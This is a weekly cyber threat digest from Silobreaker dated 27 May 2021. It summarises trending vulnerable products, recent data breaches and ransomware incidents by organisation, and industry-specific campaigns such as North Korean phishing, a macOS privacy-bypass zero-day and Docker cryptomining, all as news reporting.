27 May 2021

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source
Name Heat 7
Nagios Fusion
VMware vCenter Server
Apple tvOS
FFmpeg
Cisco Small Business
Deep & Dark Web
Name Heat 7
Xbox 360
WinRAR
Microsoft IIS
Roblox
Electrum Bitcoin Wallet

The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.

Data Leaks & Breaches

Leaks & Breaches
Company Information Affected
DailyQuiz The data of DailyQuiz users was leaked online following an earlier breach of the site’s database. The service has admitted the breach in a message on their website.The leak contains plaintext passwords, emails, and IP addresses for 8.3 million accounts. 12,800,000
Betenbough Homes (US) REvil ransomware operators claimed an attack against the Texas builders. The company confirmed a system breach caused by ‘Russian cybercriminals’ on May 3rd, 2021, stating that the attackers obtained some sensitive personal information of individuals. REvil operators have posted a few images of driver’s licences as proof of their claims. Unknown
ISERBA Group (France) The property maintenance firm added a notice to its website stating that its IT services had been hacked. Unknown
Bose Corporation (US) Bose disclosed having suffered a data breach following a ransomware attack against its systems that was detected on March 7th, 2021. The attacker may have accessed a small number of human resources spreadsheets, exposing the names, Social Security numbers, salaries, and more, of current and former employees. Unknown
Spine & Disc Medical Center (US) The operators of Avaddon ransomware added the clinic to their leak site and shared some data as evidence of their attack. The attackers claim to have stolen medical licenses, tax certificates, medical provider information, images, client information, and more. Unknown
Zocdoc (US) The medical appointment booking company disclosed that a ‘programming error’ allowed current and former employees of medical or dental practices to access its portal after their usernames and passwords should have no longer worked. The data stored in the portal includes patient names, email addresses, phone numbers, appointment information, Social Security numbers, insurance details, and medical history. 7,600
TPG Telecom (Australia) TPG Telecom disclosed that its legacy IT-as-a-service platform TrustedCloud, which is due to be decommissioned at the end of August 2021, was compromised by an unknown attacker. 2
Daihatsu Diesel Company (UK) The European Daihatsu operations were targeted in a cyberattack on May 14th, 2021. The company discovered unauthorised access by a third party that resulted in difficulties in accessing its file server in the internal system. Unknown
Auto Parts Manufacturing Mississippi (US) The company suffered a ransomware attack that resulted in the theft and leaking of some financial and customer data. Unknown
BPJS Kesehatan (Indonesia) Cyble Inc researchers identified a threat actor called ‘kotz’ that claims to be in possession of data belonging to residents of Indonesia stolen from BPJS Kesehatan. Among the data are full names, dates of birth, mobile phone numbers, email IDs, national identity numbers, and in some cases annual salaries.  200,000,000
Alaska Department of Health and Social Services (US) The website of the department was hit by a malware attack that resulted in the disruption of some online services. An investigation is ongoing to determine whether any confidential or personal information was compromised. Unknown
Unknown (Turkey) TechNadu researchers reported seeing databases containing user details from over 300 Turkish betting sites for sale on the internet. According to the seller, 90% of the databases contain usernames, full names, IP addresses, phone numbers, email addresses, and various activity details. The information is dated between August 2019 and May 2021. Unknown
Finolex (India) Conti ransomware operators claim to have attacked India’s largest cables manufacturer. The actors purportedly stole 439GB of data, including personal employee details, financial documents, client databases, contracts, and sales reports. Potentially compromised employee data includes addresses, phone numbers, passport scans, and more. Clients’ shipping addresses, phone numbers, and email addresses were also possibly exposed. Unknown
Adirondack Health (US) The healthcare provider was impacted by the ransomware attack against its vendor CaptureRx. The personal information of its patients was stolen in the attack, including their names, dates of birth, prescription information, and medical record numbers. 877
One Call (UK) The Doncaster insurance company disclosed a ransomware attack that occurred on May 13th, 2021. The operators of DarkSide ransomware demanded a £15 million ransom and threatened to leak data they claim to have stolen, which reportedly includes customer information such as passwords and bank details. Unknown
Mercari (Japan) The e-commerce company disclosed that the Codecov supply chain attack exposed thousands of customer records. This includes 17,085 financial records for transactions that took place in 2014, exposing bank codes, branch codes, account numbers, account holders, and transfer amounts. Other impacted data includes records on business partners, employees, and more, exposing names, dates of birth, affiliation, email addresses, and other details. Unknown
Air India Air India revealed that an attack against aviation industry IT company SITA, first disclosed in February 2021, led to the theft of data belonging to its passengers. The information dates from August 26th, 2011 to February 3rd, 2021, and includes names, dates of birth, credit card data, passport information, contact details, and more. 4,500,000
Omiai (Japan) The online dating service provider was targeted in an unauthorised server access incident between April 20th and April 26th, 2021. A threat actor may have stolen the images of members’ driver’s licenses, health insurance cards and passports. 1,710,000
The Beech Acres Parenting Center (US) The Cincinnati centre discovered that an unauthorised actor gained access to some employee email accounts between December 29th, 2020 and March 18th, 2021. Some of the emails contained client information, including names, dates of birth, medical details, and, in some cases, health insurance information and Social Security numbers. Unknown
Waikato District Health Board (New Zealand) Journalists have been receiving what appears to be personal and patient information that the threat actors behind the recent ransomware attack against the Waikato DHB claim to have exfiltrated. The attackers stated that they are in possession of confidential patient notes, staff details, and financial information. Unknown
Federal Public Service Interior (Belgium) The service was targeted in a cyberattack believed to be associated with China that involved the Microsoft Exchange exploit linked to Hafnium. The attack dates back to April 2019, but was only discovered in March 2021. The attack reportedly targeted information collected by the service, which maintains the population register, election and crisis management data, police databases, and more. Unknown
CEFCO (US) Hackers posted 42GB of data allegedly stolen from the gas and convenience store chain on the new leaked data marketplace Marketo Leaks. The published data includes financial documents, contracts, account lists, budget reports, and more, pertaining to clients, partners, and competitors. Unknown
Harper County Community Hospital (US) The hospital was targeted in a ransomware attack on March 24th, 2021, compromising the data of patients. Affected information includes Social Security numbers, birthdates, addresses, patient account numbers, medical diagnoses and health insurance details. 5,725
Bruhat Bengaluru Mahanagara Palike (India) Free Software Movement of India found that the data records of COVID-19 tests in Bengaluru, handled by BBMP, were made public by its contractor Xyram Software Solutions. The leak reportedly affected BBMP’s Public Health Activities, Surveillance and Tracking website. The personal data of anyone who has been tested in Karnataka could be accessed by typing their 10-digit mobile number onto the Xyramsoft site. Unknown
Clover Park School District (US) An investigation is ongoing following a system outage that caused ‘a technology issue’ at the school. A screenshot sent to KIRO 7 shows a link to a site that threatens to leak sensitive information if no payment is made, a typical threat seen in ransomware attacks. Unknown
Marietta City School District (US) The email accounts of several employees were hacked, with some believed to have been compromised since 2018. According to Marietta Police Captain Aaron Nedeff, student information was likely not impacted. Unknown
Möbelstadt Sommerlad (Germany) The furniture retailer recently disclosed having been targeted by DarkSide ransomware. According to security researcher Chum1ng0, the company is now listed on the data leak site of REvil ransomware. The threat actors claim to be in possession of over 175GB of data and uploaded some screenshots as proof. Unknown
Commport Communications (US) The Canada Post electronic data interchange supplier was targeted in a ransomware attack, compromising the data of its 44 large parcel business customers. In terms of breached records, 97% of the leak consists of package recipient names and addresses, and the remainder includes email addresses or phone numbers.  950,000
Ministry of Land, Infrastructure, Transport and Tourism (Japan) The ministry reported that the email addresses of its employees and business partners were leaked, alongside internal mail data. The incident was caused by a compromise of the Fujitsu’s ProjectWEB information-sharing software. 76,000

Attack Type mentions in Government

Time Series

This chart shows the trending Attack Types related to Government over the last week.

Weekly Industry View

Industry View
Industry Information
Banking & Finance East Security researchers observed a new campaign carried out by the North Korea-linked actor Thallium. The group is known to particularly focus on individuals working on North Korean issues. Thallium is using phishing emails disguised as financial transaction notifications and impersonating domestic commercial banks in South Korea. The emails feature designs similar to legitimate notifications. They contain an Excel attachment, which tricks the user into enabling malicious macro code. The attack may result in a data breach, and might spread through the victim’s network.
Government United States law enforcement discovered a step-by-step tutorial on how to commit unemployment identity fraud through the Texas Workforce Commission website. The guide was posted in a WhatsApp group chat of the Nigerian cybercriminal organisation known as Scattered Canary. The group uses stolen identities obtained from the dark web to file benefit claims. Scattered Canary uses prepaid Green Dot cards to funnel the money offshore before the claims are flagged.
Technology Jamf Protect researchers discovered an Apple macOS vulnerability exploited by XCSSET malware. The zero-day flaw, tracked as CVE-2021-30713, bypassed the Transparency Consent and Control framework, and allowed the attackers to gain full disk access, screen recording abilities, and other permissions without the user’s explicit consent. XCSSET operators exploited the issue to take screenshots of the victim’s desktop. To exploit the newly discovered flaw, the malware injects a custom AppleScript into a donor application with pre-existing screen recording permissions, such as Zoom. The issue was patched in macOS versions 11.4 and above.
Healthcare Cyble researchers observed COVID-19 vaccination registration scams targeting Indian users. The scammers call potential victims impersonating officials from legitimate organisations asking for their names, dates of birth, Aadhar card, and other details to purportedly register them for the vaccine. The victims are then tricked into providing one-time passwords associated with their Aadhar numbers. The fraudsters might then use the submitted details to make unauthorised financial transactions.
Cryptocurrency Sentinel Labs researchers identified an ongoing cryptocurrency mining campaign targeting Docker Linux systems with XMRig. The malware relies on several obfuscation methods, rather than specific exploit components. The attacks involve multiple shell scripts, one of which reuses multiple patterns of base64 encoding which the researchers take as evidence that the threat actor is inexperienced. The attacker uses steganography to bypass detection and download a JPEG file containing an ELF binary. 

News and information concerning each mentioned industry over the last week.

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Silobreaker Weekly Cyber Digest

Sign up for weekly news on data breaches, hacker groups, malware and vulnerabilities.

Silobreaker
This website uses cookies.
See our privacy policy at www.silobreaker.com/legal